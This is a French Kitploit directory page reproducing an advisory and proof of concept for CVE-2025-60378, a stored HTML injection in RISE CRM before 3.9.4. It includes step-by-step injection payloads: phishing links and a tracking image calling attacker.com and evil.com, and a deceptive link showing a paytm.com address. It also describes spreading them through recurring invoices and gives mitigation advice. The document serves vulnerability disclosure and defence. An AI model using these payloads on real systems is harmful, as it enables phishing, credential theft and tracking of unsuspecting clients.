Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-60378 — Preuve de concept pour l'injection HTML stockée dans RISE CRM, démontrant comment des utilisateurs authentifiés peuvent injecter du HTML malveillant dans les factures et les messages, conduisant à du hameçonnage et à la distribution de logiciels malveillants via des e-mails et des PDF automatisés. | Kitploit
Outils/GitHubGitHub/ajansha/cve-2025-60378
Analyse des VulnérabilitésExploitationExploitation d'Applications WebHameçonnageSécurité WebApprentissage et Éducation
GitHubajansha/cve-2025-60378

CVE-2025-60378

Voir le dépôt
6il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Preuve de concept pour l'injection HTML stockée dans RISE CRM, démontrant comment des utilisateurs authentifiés peuvent injecter du HTML malveillant dans les factures et les messages, conduisant à du hameçonnage et à la distribution de logiciels malveillants via des e-mails et des PDF automatisés.

Partager

CVE-2025-60378 : Injection HTML stockée dans RISE Ultimate Project Manager & CRM

⚠️ Avis de sécurité
Une vulnérabilité critique d'injection HTML stockée affectant les factures, la messagerie et les communications automatisées

CVE Severity CVSS Product


📋 Vue d'ensemble

Une vulnérabilité critique d'injection HTML stockée a été découverte dans RISE Ultimate Project Manager & CRM qui permet à des utilisateurs authentifiés d'injecter du HTML malveillant dans les lignes de factures, les notes clients et les modules de messagerie. Ce contenu injecté persiste dans la base de données et est automatiquement rendu dans les e-mails destinés aux clients, les PDF et les communications de chat, permettant des attaques de phishing à grande échelle, une compromission d'e-mails professionnels et la distribution de logiciels malveillants par e-mail/PDF.

🎯 Versions concernées

  • Produit : RISE - Ultimate Project Manager & CRM
  • Versions vulnérables : < 3.9.4
  • Version corrigée : 3.9.4+

🔍 Détails de la vulnérabilité

AttributValeur
ID CVECVE-2025-60378
TypeInjection HTML stockée
CWECWE-79
Vecteur d'attaqueRéseau/À distance
AuthentificationRequise (privilèges faibles)
Interaction utilisateurAucune
GravitéÉLEVÉE
CVSS v3.18.1 - Élevée
DécouvreurAjansha Shankar

Description

RISE CRM ne parvient pas à assainir et encoder correctement le contenu HTML dans plusieurs champs modifiables par l'utilisateur, notamment les factures, les messages et les notes clients. Lorsque des utilisateurs authentifiés injectent des charges utiles HTML dans ces champs, le contenu est stocké dans la base de données sans filtrage adéquat. Par la suite, ce HTML malveillant est automatiquement rendu dans les e-mails destinés aux clients, les pièces jointes PDF et les modules de messagerie/chat sans échappement approprié. Les factures récurrentes et la messagerie automatisée amplifient l'attaque en distribuant du contenu malveillant à plusieurs destinataires simultanément.

Composants concernés

  • ✗ Lignes de factures (champ description)
  • ✗ Module de notes/messagerie client
  • ✗ Système de chat et de messagerie
  • ✗ Module de génération de relevés clients
  • ✗ Système d'e-mails automatisé (factures récurrentes, rappels)
  • ✗ Pièces jointes PDF

Cause racine

  • ❌ Assainissement insuffisant des entrées sur les champs de factures, messages et notes clients
  • ❌ Absence d'encodage de sortie HTML dans les modèles d'e-mails et la génération de PDF
  • ❌ Aucune validation du contenu avant stockage dans la base de données
  • ❌ Absence de restrictions sur le HTML/JavaScript dans les communications clients
  • ❌ Les systèmes automatisés distribuent du contenu non validé sans filtrage supplémentaire

💥 Impact

Implications en matière de sécurité

  • 🎣 Phishing à grande échelle : Le contenu injecté peut usurper des communications légitimes et rediriger plusieurs clients vers des sites contrôlés par l'attaquant
  • 💼 Compromission d'e-mails professionnels : Les factures et messages malveillants envoyés aux clients semblent provenir d'une source de confiance
  • 💬 Messagerie compromise : Les charges utiles malveillantes dans le chat/messagerie atteignent directement les membres de l'équipe et les clients
  • 🦠 Distribution de logiciels malveillants : Des liens ou iframes malveillants intégrés distribuent des logiciels malveillants via e-mail/PDF/messagerie
  • 🔄 Distribution automatisée des attaques : Les factures récurrentes et les messages automatisés garantissent que la charge utile atteint plusieurs destinataires sans intervention manuelle
  • 👥 Attaque multi-vecteurs : La combinaison des surfaces d'attaque e-mail, PDF et messagerie augmente le taux de compromission réussi

Évaluation de la triade CIA

FacteurImpactExplication
Confidentialité🔴 ÉLEVÉELes identifiants clients et les données sensibles peuvent être récoltés via le phishing
Intégrité🔴 ÉLEVÉELe contenu malveillant peut modifier la perception des communications et des relations commerciales
Disponibilité🟡 FAIBLEImpact direct limité sur la disponibilité du système

Scénarios d'attaque réels

Scénario 1 : Campagne de phishing basée sur les factures

Un attaquant disposant d'un accès de chef de projet à faibles privilèges crée une facture avec du HTML malveillant :

root@kitploit:~
<a href="https://attacker.com/fake-payment">Cliquez ici pour voir le statut du paiement</a>

La facture est envoyée à plus de 100 clients via un e-mail automatisé. Tous les clients reçoivent ce qui semble être une facture légitime les dirigeant vers un site de phishing. L'attaquant récolte les identifiants de plusieurs victimes simultanément.

Scénario 2 : Attaque basée sur la messagerie

Un attaquant injecte du HTML malveillant dans un message client :

root@kitploit:~
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Télécharger les fichiers du projet mis à jour</a>

Tous les membres de l'équipe et les clients reçoivent le message dans leur chat et cliquent sur les liens pour télécharger des logiciels malveillants.

Scénario 3 : Distribution de logiciels malveillants via factures récurrentes

Un attaquant configure une facture récurrente avec une charge utile de distribution de logiciels malveillants. Chaque mois, les clients reçoivent automatiquement des factures contenant du contenu malveillant intégré, fournissant un vecteur d'attaque persistant.

🧪 Preuve de concept

Configuration de l'environnement

  • Accès au panneau d'administration RISE CRM avec les permissions de création de factures/messages
  • Toute version antérieure à 3.9.4

Étapes de la PoC

Étape 1 : Accéder à la création de factures ou de messages

root@kitploit:~
Naviguer vers : Tableau de bord RISE CRM → Factures/Messages → Créer nouveau

Étape 2 : Injecter la charge utile HTML dans le champ description/message

root@kitploit:~
<a href="https://attacker.com">Cliquez ici pour voir la facture</a>

Étape 3 : Ajouter une image malveillante avec redirection

root@kitploit:~
<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>

Étape 4 : Ajouter une charge utile de style trompeur

root@kitploit:~
<h1><font color=red>Visitez notre nouveau site Web</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>

Étape 5 : Configurer la distribution récurrente

  • Enregistrer l'enregistrement
  • Activer l'option « Récurrent » (si disponible pour les factures/messages)
  • Définir la fréquence (hebdomadaire, mensuelle, etc.)
  • Le système envoie automatiquement à tous les clients concernés

Étape 6 : Vérifier le vecteur d'attaque

  • Vérifier la boîte de réception e-mail du client
  • Vérifier la messagerie/le chat du client
  • Ouvrir la pièce jointe PDF
  • Observer le HTML malveillant rendu sur tous les canaux

Résultat attendu

✅ Le HTML injecté est rendu dans les e-mails, PDF et messageries sans échappement ✅ Les liens sont cliquables et redirigent vers les sites de l'attaquant ✅ Les images se chargent depuis des serveurs contrôlés par l'attaquant ✅ Le contenu persiste dans toutes les futures communications clients ✅ La distribution récurrente atteint plusieurs destinataires automatiquement

🛡️ Atténuation

Pour les utilisateurs finaux

  1. ✅ Mettre à jour immédiatement : Mettre à jour vers RISE CRM v3.9.4 ou version ultérieure
  2. 🔍 Auditer tous les enregistrements : Examiner les factures, messages et notes clients récents pour détecter du contenu HTML suspect
  3. ⚠️ Notification des clients : Alerter tous les clients si des factures ou messages suspects ont été envoyés
  4. 🔄 Réinitialisation des identifiants : Recommander aux clients de changer leurs mots de passe s'ils ont cliqué sur des liens
  5. 📝 Surveiller l'activité : Vérifier les journaux d'audit pour détecter des modifications non autorisées de factures/messages
  6. 🔐 Désactiver les récurrences : Désactiver temporairement les factures/messages récurrents jusqu'à l'application du correctif

📚 Références

  • CWE-79 : Neutralisation inappropriée des entrées lors de la génération de pages Web
  • OWASP : Cross-site Scripting (XSS)
  • OWASP : Injection HTML
  • OWASP : Encodage de sortie
  • Entrée officielle CVE-2025-60378

📅 Chronologie

DateÉvénement
À déterminerVulnérabilité découverte
À déterminerFournisseur notifié
À déterminerCVE-2025-60378 attribué
À déterminerCorrectif publié (v3.9.4)
À déterminerDivulgation publique

👤 Crédits

Découvert par : Ajansha Shankar

LinkedIn : https://www.linkedin.com/in/ajansha-shankar/

📊 Évaluation CVSS v3.1

Vecteur : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Score : 8.1 (ÉLEVÉ)

Détail :

  • Vecteur d'attaque (AV:N) : Réseau - Peut être exploitée à distance
  • Complexité de l'attaque (AC:L) : Faible - Aucune condition particulière requise
  • Privilèges requis (PR:L) : Faibles - Nécessite un utilisateur authentifié avec des privilèges de base de chef de projet
  • Interaction utilisateur (UI:N) : Aucune - Aucune interaction utilisateur nécessaire ; les systèmes automatisés distribuent la charge utile
  • Portée (S:U) : Inchangée - L'impact est limité au composant vulnérable
  • Confidentialité (C:H) : Élevée - Vol potentiel d'identifiants via phishing auprès de plusieurs clients
  • Intégrité (I:H) : Élevée - Du contenu malveillant peut être injecté et distribué à plusieurs destinataires
  • Disponibilité (A:N) : Aucune - Aucun impact sur la disponibilité du système

📧 Contact

Pour toute question ou information supplémentaire :

  • LinkedIn : https://www.linkedin.com/in/ajansha-shankar/

⭐ Si cette recherche vous a été utile, pensez à mettre une étoile sur ce dépôt !

🔔 Restez informé : Surveillez ce dépôt pour les mises à jour sur cette recherche et les futures recherches en sécurité.

  • CVE-2025-60374 - XSS stocké dans le chatbot Perfex CRM
  • CVE-2025-55903 - Injection HTML stockée dans les factures Perfex CRM
  • CVE-2025-60375 - Contournement d'authentification dans Perfex CRM
Télécharger l’outil